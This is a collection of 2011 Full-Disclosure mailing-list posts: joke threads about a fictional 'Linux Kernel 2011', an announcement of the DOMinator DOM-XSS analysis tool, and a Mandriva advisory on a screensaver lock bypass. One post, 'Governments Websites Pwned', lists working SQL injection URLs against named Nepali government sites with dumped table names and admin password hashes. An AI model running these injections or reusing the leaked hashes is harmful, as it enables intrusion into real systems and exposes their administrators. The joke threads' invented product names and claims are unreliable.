Apologies in advance for thread-jacking but does someone happen to have a spare GNU/Linux CD-Key for sale? I'm having some issues with Linux Genuine Advantage for Linux Kernel 2011 Home Edition. I did recently change my motherboard and evidently it was an OEM license and LGA went crazy. Please do not recommend a Linux key-gen, I do not pirate GNU/Linux! I've seen many of these Linux torrents floating around and the last thing I want is to be sued over downloading Linux! Amazingly many of them are right out there in the open too! Kind Regards, John Jacobs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel 2011 local root does it exist
But they don't work if EMET for Linux OS 9 is installed. El mié, 18-05-2011 a las 07:04 -0700, Paul Heinlein escribió: This is so true, and it's maddening because those same exploits were also present in Linux OS 9. You won't have to dig hard to find them. signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel 2011 local root does it exist
Hi, just a quick question, do those exploits you mention work in a jailbroken device? I'm running Linux Leopard lOS 4.3 on my iAndroid tablet. On Wed, May 18, 2011 at 11:41 AM, Joxean Koret joxeanko...@yahoo.es wrote: Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have exploits for Linux XP. I would like to know is there any local root exploit exist for linux kernel 2011 . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DOMinator - The DOMXss Analyzer Tool - is finally public
What is DOMinator? DOMinator is a Firefox based software for analysis and identification of DOM Based Cross Site Scripting issues (DOMXss). It is the first runtime tool which can help security testers to identify DOMXss. How it works? It uses dynamic runtime tainting model on strings and can trace back taint propagation operations in order to understand if a DOMXss vulnerability is actually exploitable. ... If you're interested in it continue the reading here: http://blog.mindedsecurity.com/2011/05/dominator-project.html More whitepapers in the next days. Cheers Stefano -- ...oOOo...oOOo Stefano Di Paola Software Security Engineer Owasp Italy RD Director Web: www.wisec.it Twitter: http://twitter.com/WisecWisec .. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel 2011 local root does it exist
You can only jailbreak FreeBSD devices. On 05/18/2011 01:37 PM, Mario Vilas wrote: Hi, just a quick question, do those exploits you mention work in a jailbroken device? I'm running Linux Leopard lOS 4.3 on my iAndroid tablet. On Wed, May 18, 2011 at 11:41 AM, Joxean Koret joxeanko...@yahoo.es wrote: Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have exploits for Linux XP. I would like to know is there any local root exploit exist for linux kernel 2011 . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:093 ] gnome-screensaver
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:093 http://www.mandriva.com/security/ ___ Package : gnome-screensaver Date: May 18, 2011 Affected: Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in gnome-screensaver: gnome-screensaver 2.14.3, 2.22.2, 2.27.x, 2.28.0, and 2.28.3, when the X configuration enables the extend screen option, allows physically proximate attackers to bypass screen locking, access an unattended workstation, and view half of the GNOME desktop by attaching an external monitor (CVE-2010-0285). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0285 ___ Updated Packages: Mandriva Enterprise Server 5: ca90f4615f735029808f23dbdc79355d mes5/i586/gnome-screensaver-2.24.0-1.1mdvmes5.2.i586.rpm f87e148836373deac42848cf6df47b89 mes5/SRPMS/gnome-screensaver-2.24.0-1.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: b784b6bf8da7fac869ef5a63f5c3f6e7 mes5/x86_64/gnome-screensaver-2.24.0-1.1mdvmes5.2.x86_64.rpm f87e148836373deac42848cf6df47b89 mes5/SRPMS/gnome-screensaver-2.24.0-1.1mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFN0/ZbmqjQ0CJFipgRAjT9AJ9RfeC5iXfWtzO/WhtCYIckUyY4XQCgv/YW grLk1reKTbC+pWSTo4JHioc= =+P36 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel 2011 local root does it exist
This made my morning :D On 18/05/11 19:11, Joxean Koret wrote: Sorry men, there is no exploit for Linux Kernel(TM) 2011. But you have exploits for Linux XP. I would like to know is there any local root exploit exist for linux kernel 2011 . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel 2011 local root does it exist
On Wed, May 18, 2011 at 13:59, root ro...@fibertel.com.ar wrote: You can only jailbreak FreeBSD devices. FreeBSD is dead. Netcraft confirms it. kmw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Governments Websites Pwned !!
Didn't you already fael that class Cal? On Wed, May 18, 2011 at 6:03 PM, Cal Leeming c...@foxwhisper.co.uk wrote: Welcome to 101 of stay out of jail.. Todays topic is: How not to piss off the govt. :| On Wed, May 18, 2011 at 8:54 AM, aryan hacky aryan.ha...@gmail.com wrote: _ _ _ ___ _ _ / \ _ __ | |_(_)|_ _|_ __ | |_ _ __ _ _ __| | ___ _ __ ___ / _ \ | '_ \| __| |_| || '_ \| __| '__| | | |/ _` |/ _ \ '__/ __| / ___ \| | | | |_| |_| || | | | |_| | | |_| | (_| | __/ | \__ \ /_/ \_\_| |_|\__|_||___|_| |_|\__|_| \__,_|\__,_|\___|_| |___/ .com Lolzz following GOV sites SQL Injection is working from last years . why they don't like to patch it !! Preety layz people are in goverment sectors like there layz jobs . Many newbies are learning SQL injection from the Gov. sites :p lolz .. I think it is time to weak up .. Here All MySQL Version 5 And Version 4 Websites are injected ! Special Thanks to Silic0n Work Done By @r@yn... --- --- http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,database%28%29,3,4,5,6,7,8,9,10,11,12,13-- DB:eproc_seznepal_gov_np --- --- http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.tables%20where%20table_schema=database%28%29-- TAble: tbl_acknowledgement, tbl_addenda, tbl_admin_info, tbl_adminlogin, tbl_agency, tbl_agency_category, tbl_announcement, tbl_archive_auction, tbl_archive_tender, tbl_award,tbl_award1, tbl_bid,tbl_bid_document, tbl_bid_document_additional, tbl_bid_modification, tbl_clarification, tbl_company_category, tbl_contract,tbl_customer, tbl_faq,tbl_information, tbl_info --- --- http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat%28table_name,0x3a,column_name%29,3,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_schema=database%28%29-- columns: acknowledgementid, provider_id, agency_id, project_id, project_type, project_name, activity, date, time,ip, addendaid, noticeid, date, newspaper, description, filename, filetype, filesize, document, admin_id, firstname, lastname, email_addr, secret_question, answer, admin_id, user_name, pass_word, user_level, agency_id, organization_name, organization_reg_num, vat_num table tbl_acknowledgement:acknowledgementid, tbl_acknowledgement:provider_id, tbl_acknowledgement:agency_id, tbl_acknowledgement:project_id, tbl_acknowledgement:project_type, tbl_acknowledgement:project_name, tbl_acknowledgement:activity, tbl_acknowledgement:date, tbl_acknowledgement:time, tbl_acknowledgement:ip, tbl_addenda:addendaid, tbl_addenda:noticeid http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat(admin_id,0x3a,user_name,0x3a,pass_word),3,4,5,6,7,8,9,10,11,12,13 from tbl_adminlogin-- ARMIN: 1:sez:7a4489303e667e03b6414997b53aa003 --- --- http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,database%28%29-- DB:national_nm --- --- http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29-- table:admin,events,news --- --- http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_schema=database%28%29-- col: id, username, password, events_id, date, events_title, events_short_desc, events_full_desc, enabled, id,date, news_title, news_short_desc, author, news_full_desc,enabled --- --- http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28username,0x3a,password%29%20from%20admin-- admin pass:admin:*4F7F6D6AF7CD8CD89967918F893DA545DDA85623 ---
Re: [Full-disclosure] DOMinator - The DOMXss Analyzer Tool - is finally public
hi DOMinator can't work on firefox 3.6.17? hitest 2011/5/18 Stefano Di Paola wi...@wisec.it What is DOMinator? DOMinator is a Firefox based software for analysis and identification of DOM Based Cross Site Scripting issues (DOMXss). It is the first runtime tool which can help security testers to identify DOMXss. How it works? It uses dynamic runtime tainting model on strings and can trace back taint propagation operations in order to understand if a DOMXss vulnerability is actually exploitable. ... If you're interested in it continue the reading here: http://blog.mindedsecurity.com/2011/05/dominator-project.html More whitepapers in the next days. Cheers Stefano -- ...oOOo...oOOo Stefano Di Paola Software Security Engineer Owasp Italy RD Director Web: www.wisec.it Twitter: http://twitter.com/WisecWisec .. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DOMinator - The DOMXss Analyzer Tool - is finally public
Hey IEhrepus Il giorno mer, 18/05/2011 alle 20.34 -0700, IEhrepus ha scritto: DOMinator can't work on firefox 3.6.17? DOMinator consists in a core and an extension. The core is Firefox with some custom c/c++ code in order to add taint flag to JSStrings and deal with taint propagation. So, in order to launch DOMinator you have to download the Linux or Windows version which is a patched Firefox binary. http://code.google.com/p/dominator/downloads/detail?name=DOMinator_firefox_3.6.13_Linux_32Bit.tgz http://code.google.com/p/dominator/downloads/detail?name=DOMinator_firefox_3.6.13_Windows_32Bit.zip and follow the instructions here: http://code.google.com/p/dominator/wiki/InstallationInstructions That means that: *The extension itself is only part of it*. *It won't work without the patched Firefox.* You can have a look at the diff file here: http://code.google.com/p/dominator/downloads/detail?name=DOMinator_diff.txt So I'll have to apply that patch to the source code of FF 3.6.17 compile it. As a side note it has been seen that the Windows version of DOMinator doesn't work on 64 bit OS. I'd suggest the linux version in that case. Cheers Stefano hitest 2011/5/18 Stefano Di Paola wi...@wisec.it What is DOMinator? DOMinator is a Firefox based software for analysis and identification of DOM Based Cross Site Scripting issues (DOMXss). It is the first runtime tool which can help security testers to identify DOMXss. How it works? It uses dynamic runtime tainting model on strings and can trace back taint propagation operations in order to understand if a DOMXss vulnerability is actually exploitable. ... If you're interested in it continue the reading here: http://blog.mindedsecurity.com/2011/05/dominator-project.html More whitepapers in the next days. Cheers Stefano -- ...oOOo...oOOo Stefano Di Paola Software Security Engineer Owasp Italy RD Director Web: www.wisec.it Twitter: http://twitter.com/WisecWisec .. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel 2011 local root does it exist
As long as there are postmen and this stratospheric level of discussion on FD, there is zest in life. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
